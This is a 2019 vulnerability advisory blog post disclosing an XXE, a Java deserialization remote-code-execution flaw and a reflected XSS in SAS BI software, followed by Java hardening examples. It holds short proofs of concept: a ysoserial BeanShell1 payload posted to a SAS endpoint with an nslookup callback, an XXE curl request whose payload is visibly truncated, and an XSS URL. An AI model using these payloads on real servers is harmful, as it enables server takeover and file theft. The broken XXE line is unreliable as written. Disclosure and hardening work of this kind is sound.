
ENG: The S-Unit finds three high impact vulnerabilities in SAS Business Intelligence software

By Sara Jun 06, 2019

Multiple web services in the SAS application are vulnerable to Java deserialization attacks, and SAS BI Web Services 9.4 is vulnerable to unauthenticated XML External Entity injection.

You can find the Dutch version of this post here

Unauthenticated XML External Entities in SAS BI Web Services 9.4

The REST endpoint /SASBIWS/rest/services is vulnerable to XML External Entity attacks. The REST services use an XML parser to process the request. This parser is configured in a way that allows the interpretation of Document Type Definitions and the use of external (parameter) entities. The endpoint can therefore be used to read content from external sources, including local files on the server running the REST services and/or files from other servers in the local network.

PoC:
curl -i -s -k --data-binary ' %y; ]> ' -X $'POST' https://[target]/SASBIWS/rest/services -H $'Content-Type: application/xml'
Information and fix: http://support.sas.com/kb/62/987.html
CVE: CVE-2018-20733
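The root cause described above is a parser that accepts a DOCTYPE and resolves external entities. As an added illustration (not code from this advisory or from SAS), the following Java class puts the permissive JAXP default beside a hardened configuration that rejects any DOCTYPE outright, so neither internal nor external entity declarations are ever interpreted. It assumes the JDK's built-in Xerces-based parser, which understands the feature URIs used; the sample request body is constructed for this example.

```java
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import java.io.IOException;
import java.io.StringReader;

public class HardenedXmlParser {

    // Parser configured the way the vulnerable endpoint is described: the JAXP
    // defaults allow a DOCTYPE and resolve external entities. Shown for contrast only.
    static DocumentBuilder permissiveBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        return f.newDocumentBuilder();
    }

    // Hardened parser: reject any DOCTYPE, so no entity declarations are ever
    // interpreted. The remaining settings are defence in depth in case a different
    // parser implementation ignores the first feature.
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        // Empty string = no protocols allowed for fetching external DTDs/schemas.
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        return f.newDocumentBuilder();
    }

    // Parse a request body and report the root element, or why it was rejected.
    static String parseRoot(DocumentBuilder b, String xml) {
        try {
            Document d = b.parse(new InputSource(new StringReader(xml)));
            return d.getDocumentElement().getTagName();
        } catch (SAXException | IOException e) {
            return "rejected: " + e.getMessage();
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample: a request body carrying an internal DTD with an
        // entity declaration, and the same request without any DOCTYPE.
        String withDoctype = "<!DOCTYPE request [ <!ENTITY greeting \"hello\"> ]>"
                + "<request>&greeting;</request>";
        String plain = "<request/>";
        System.out.println("permissive: " + parseRoot(permissiveBuilder(), withDoctype));
        System.out.println("hardened  : " + parseRoot(hardenedBuilder(), withDoctype));
        System.out.println("hardened  : " + parseRoot(hardenedBuilder(), plain));
    }
}
```

The permissive builder accepts the body with the DOCTYPE; the hardened builder rejects it at the DOCTYPE itself, before any entity (internal or external) is looked at, and still parses the plain body. Disallowing the DOCTYPE entirely is the simplest rule for a service whose clients have no legitimate reason to send one.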

Unauthenticated Java deserialization in SAS Web Infra Platform and Search Interface to SAS Content

Multiple web services in the SAS application are vulnerable to Java deserialization attacks. The SAS application contains web services, some of which expect serialized Java objects as input. These endpoints do not validate whether the input comes from a trusted source. The web services can therefore be used to deserialize arbitrary Java objects, which can lead to remote code execution and complete takeover of the server.

PoC:
java -jar ysoserial.jar BeanShell1 "nslookup rcetest.[target].com"
curl -i -s -k --data-binary sas_beanshell.txt -X $'POST' https://[target]/SASWIPClientAccess/remote/ServiceRegistry -H "Content-type: application/java"
Information and fix: https://support.sas.com/kb/63/391.html
CVE: CVE-2018-20732
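The weakness described here is an endpoint that hands whatever bytes the client sent straight to ObjectInputStream. As an added illustration (not code from this advisory or from SAS), the class below shows that unfiltered read beside a hardened one that installs a deserialization allow-list with java.io.ObjectInputFilter before the first readObject() call. It assumes Java 9 or later; the ServiceRequest type and the sample payloads are constructed for this example and do not represent the SAS wire format.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

public class FilteredDeserialization {

    // The only type this (constructed) service legitimately accepts.
    static final class ServiceRequest implements Serializable {
        private static final long serialVersionUID = 1L;
        final String serviceName;
        ServiceRequest(String serviceName) { this.serviceName = serviceName; }
    }

    // Allow-list filter: the request type, a bounded object graph, and nothing
    // else. Any other class, including gadget classes from libraries that happen
    // to be on the classpath, is rejected before its readObject() ever runs.
    static ObjectInputFilter requestFilter() {
        return ObjectInputFilter.Config.createFilter(
            "maxdepth=4;maxrefs=64;maxbytes=4096;"
            + FilteredDeserialization.class.getName() + "$ServiceRequest;!*");
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // The pattern the advisory describes: the request body is deserialized as-is,
    // so the sender chooses which classes get instantiated.
    static Object readUnfiltered(byte[] body) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(body))) {
            return ois.readObject();
        }
    }

    // Hardened: the filter is set on the stream before anything is read from it.
    static Object readFiltered(byte[] body) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(body))) {
            ois.setObjectInputFilter(requestFilter());
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        byte[] expected = serialize(new ServiceRequest("ServiceRegistry"));
        // Constructed stand-in for a payload of an unexpected type: any class
        // outside the allow-list behaves the same way under the filter.
        byte[] unexpected = serialize(new java.util.HashMap<String, String>());

        System.out.println("unfiltered, unexpected type: " + readUnfiltered(unexpected).getClass());
        System.out.println("filtered, expected type:     " + readFiltered(expected).getClass());
        try {
            readFiltered(unexpected);
        } catch (InvalidClassException e) {
            System.out.println("filtered, unexpected type:   rejected (" + e.getMessage() + ")");
        }
    }
}
```

The filter rejects the unexpected class with an InvalidClassException carrying "filter status: REJECTED" while the expected request still deserializes. The pattern ends in "!*" so the list is a true allow-list; the maxdepth, maxrefs and maxbytes limits additionally bound the object graph so that even an allowed type cannot be used to exhaust memory. Where no serialized input should be accepted at all, the stronger fix is to remove the endpoint or switch it to a data-only format.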

A third reflected Cross-Site Scripting in SAS Logon Manager 9.4

The timeout page at https://[target]/SASLogon/timeout is once again vulnerable to reflected Cross-Site Scripting. When a GET parameter containing JavaScript code is added to the URL, it is inserted into the window.location.href assignment that runs after clicking "log off", and the JavaScript code is executed.

PoC:
https://[target]/SASLogon/timeout?qq';alert(1);a= 'a
Information and fix: http://support.sas.com/kb/55/537.html
CVE: CVE-2015-9281
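The PoC works because a request parameter ends up inside a JavaScript string literal in the page's inline script, so a single quote in the value closes the literal and the rest runs as code. As an added illustration (not code from this advisory or from SAS), the Java class below shows that rendering pattern beside a hardened version that validates the redirect target as a relative path on the application and emits it as a properly escaped JavaScript string literal. How the real timeout page builds its script is an assumption made for this example; the inputs in main are the advisory's own PoC value and a constructed legitimate path.

```java
import java.net.URI;
import java.net.URISyntaxException;

public class TimeoutPageRenderer {

    // Assumed shape of the vulnerable page: the parameter is spliced into the
    // inline script as-is, so a quote in the value ends the string literal.
    static String renderUnsafe(String target) {
        return "<script>function logoff(){ window.location.href = '" + target + "'; }</script>";
    }

    // Encode a value for use inside a JavaScript string literal. Every character
    // outside a small safe set is emitted as a backslash-u escape, which the JS
    // engine reads purely as data: quotes cannot close the literal and '<'
    // cannot start a closing </script> tag.
    static String jsStringLiteral(String s) {
        StringBuilder out = new StringBuilder("'");
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            boolean plain = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z')
                    || (c >= '0' && c <= '9') || c == '/' || c == '.' || c == '-' || c == '_';
            if (plain) {
                out.append(c);
            } else {
                out.append(String.format("\\u%04x", (int) c));
            }
        }
        return out.append('\'').toString();
    }

    // Accept only a relative path under /SASLogon/ on this application; anything
    // else (absolute URLs, protocol-relative URLs, unparseable values) falls back
    // to a fixed page. This also rules out open redirects through the parameter.
    static String safeTarget(String candidate) {
        try {
            URI u = new URI(candidate).normalize();
            if (u.getScheme() == null && u.getAuthority() == null
                    && u.getPath() != null && u.getPath().startsWith("/SASLogon/")) {
                return u.getPath();
            }
        } catch (URISyntaxException ignored) {
            // fall through to the default target
        }
        return "/SASLogon/login";
    }

    // Hardened rendering: validated target, then encoded for the JS context.
    static String renderSafe(String target) {
        return "<script>function logoff(){ window.location.href = "
                + jsStringLiteral(safeTarget(target)) + "; }</script>";
    }

    public static void main(String[] args) {
        // The advisory's PoC parameter value, and a constructed legitimate path.
        String attack = "qq';alert(1);a= 'a";
        String legit = "/SASLogon/home";
        System.out.println(renderUnsafe(attack));
        System.out.println(renderSafe(attack));
        System.out.println(renderSafe(legit));
    }
}
```

With the unsafe renderer the PoC value lands in the script verbatim; with the hardened one it fails validation and the page redirects to the fixed login path, while the legitimate path passes through unchanged. Validation and context-specific encoding are separate defences here: the encoder alone would already stop the script injection, and the validator alone would already stop off-site redirects, so the page keeps both.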
